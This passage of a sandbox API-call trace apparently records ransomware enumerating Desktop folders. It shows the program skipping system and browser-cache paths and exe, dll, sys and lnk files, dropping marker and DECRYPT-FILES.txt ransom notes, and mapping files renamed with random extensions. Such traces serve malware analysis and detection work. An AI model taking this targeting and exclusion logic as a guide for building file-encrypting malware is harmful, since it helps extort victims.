lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0184.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="fSI8D5g.pps.z33S0F" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps.z33S0F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps.z33S0F" [0184.717] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fSI8D5g.pps.z33S0F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsi8d5g.pps.z33s0f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.717] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=22146) returned 1 [0184.717] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.717] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.718] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.718] CloseHandle (hObject=0x260) returned 1 [0184.718] CloseHandle (hObject=0x25c) returned 1 [0184.718] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.718] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ddfaba0, ftCreationTime.dwHighDateTime=0x1d4d326, ftLastAccessTime.dwLowDateTime=0xade11d00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xade11d00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ggFLb 9Aa", cAlternateFileName="GGFLB9~1")) returned 1 [0184.718] lstrcmpW (lpString1="ggFLb 9Aa", lpString2=".") returned 1 [0184.718] lstrcmpW (lpString1="ggFLb 9Aa", lpString2="..") returned 1 [0184.718] lstrcatW (in: lpString1="ggFLb 9Aa", lpString2="\\" | out: lpString1="ggFLb 9Aa\\") returned="ggFLb 9Aa\\" [0184.718] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.718] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Program Files") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch=":\\Windows") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Games\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\All Users") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="AhnLab") returned 0x0 [0184.719] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.719] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.719] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.719] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\0a16c9.tmp") returned 59 [0184.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0184.719] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.719] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.720] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\DECRYPT-FILES.txt") returned 66 [0184.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.720] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.720] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\*" [0184.720] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ddfaba0, ftCreationTime.dwHighDateTime=0x1d4d326, ftLastAccessTime.dwLowDateTime=0xf0cec7c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0cec7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0184.720] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.720] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ddfaba0, ftCreationTime.dwHighDateTime=0x1d4d326, ftLastAccessTime.dwLowDateTime=0xf0cec7c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0cec7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.720] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.720] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.720] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0cec7c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0cec7c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0cec7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.720] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.720] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.720] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.720] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.720] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.720] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.720] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.720] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.720] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.721] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\0a16c9.tmp" [0184.721] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.721] CloseHandle (hObject=0x0) returned 0 [0184.721] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.721] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb75e60, ftCreationTime.dwHighDateTime=0x1d4c59f, ftLastAccessTime.dwLowDateTime=0xb3653a00, ftLastAccessTime.dwHighDateTime=0x1d4c80e, ftLastWriteTime.dwLowDateTime=0xadacbec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x12997, dwReserved0=0x0, dwReserved1=0x0, cFileName="3fm.pps.YcP1lN", cAlternateFileName="3FMPPS~1.YCP")) returned 1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="DECRYPT-FILES.txt") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="autorun.inf") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="boot.ini") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="desktop.ini") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="ntuser.dat") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="iconcache.db") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="bootsect.bak") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="ntuser.dat.log") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="thumbs.db") returned -1 [0184.721] lstrcmpiW (lpString1="3fm.pps.YcP1lN", lpString2="Bootfont.bin") returned -1 [0184.721] lstrlenW (lpString="3fm.pps.YcP1lN") returned 14 [0184.721] lstrcmpiW (lpString1="YcP1lN", lpString2="lnk") returned 1 [0184.721] lstrcmpiW (lpString1="YcP1lN", lpString2="exe") returned 1 [0184.722] lstrcmpiW (lpString1="YcP1lN", lpString2="sys") returned 1 [0184.722] lstrcmpiW (lpString1="YcP1lN", lpString2="dll") returned 1 [0184.722] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.722] lstrlenW (lpString="3fm.pps.YcP1lN") returned 14 [0184.722] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.722] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="3fm.pps.YcP1lN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps.YcP1lN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps.YcP1lN" [0184.722] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.722] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\3fm.pps.YcP1lN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\3fm.pps.ycp1ln"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.722] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=76183) returned 1 [0184.722] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.722] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.723] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.723] CloseHandle (hObject=0x268) returned 1 [0184.723] CloseHandle (hObject=0x264) returned 1 [0184.723] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.723] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadacbec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadacbec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadacbec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.723] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.723] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefeb1d0, ftCreationTime.dwHighDateTime=0x1d4c5a7, ftLastAccessTime.dwLowDateTime=0xa129b790, ftLastAccessTime.dwHighDateTime=0x1d4cfab, ftLastWriteTime.dwLowDateTime=0xadb18180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xefb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", cAlternateFileName="F3XG9N~1.OGV")) returned 1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="DECRYPT-FILES.txt") returned 1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="autorun.inf") returned 1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="boot.ini") returned 1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="desktop.ini") returned 1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="ntuser.dat") returned -1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="iconcache.db") returned -1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="bootsect.bak") returned 1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="ntuser.dat.log") returned -1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="thumbs.db") returned -1 [0184.724] lstrcmpiW (lpString1="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0", lpString2="Bootfont.bin") returned 1 [0184.724] lstrlenW (lpString="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0") returned 31 [0184.724] lstrcmpiW (lpString1="OGvTiq0", lpString2="lnk") returned 1 [0184.724] lstrcmpiW (lpString1="OGvTiq0", lpString2="exe") returned 1 [0184.724] lstrcmpiW (lpString1="OGvTiq0", lpString2="sys") returned -1 [0184.724] lstrcmpiW (lpString1="OGvTiq0", lpString2="dll") returned 1 [0184.724] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0184.724] lstrlenW (lpString="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0") returned 31 [0184.724] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0184.724] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0" [0184.724] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\f3xg9nyjq-zhfdqwlsu.wav.ogvtiq0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.725] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=61363) returned 1 [0184.725] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.725] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.725] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.725] CloseHandle (hObject=0x268) returned 1 [0184.725] CloseHandle (hObject=0x264) returned 1 [0184.726] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.726] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2bef0b0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0xadbfc9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadbfc9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="H1MiMyXALwnG6yS6", cAlternateFileName="H1MIMY~1")) returned 1 [0184.726] lstrcmpW (lpString1="H1MiMyXALwnG6yS6", lpString2=".") returned 1 [0184.726] lstrcmpW (lpString1="H1MiMyXALwnG6yS6", lpString2="..") returned 1 [0184.726] lstrcatW (in: lpString1="H1MiMyXALwnG6yS6", lpString2="\\" | out: lpString1="H1MiMyXALwnG6yS6\\") returned="H1MiMyXALwnG6yS6\\" [0184.726] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Program Files") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch=":\\Windows") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Games\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\All Users") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="AhnLab") returned 0x0 [0184.726] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.726] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.726] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.726] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\0a16c9.tmp") returned 76 [0184.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0184.727] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0184.727] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.727] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\\\DECRYPT-FILES.txt") returned 83 [0184.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 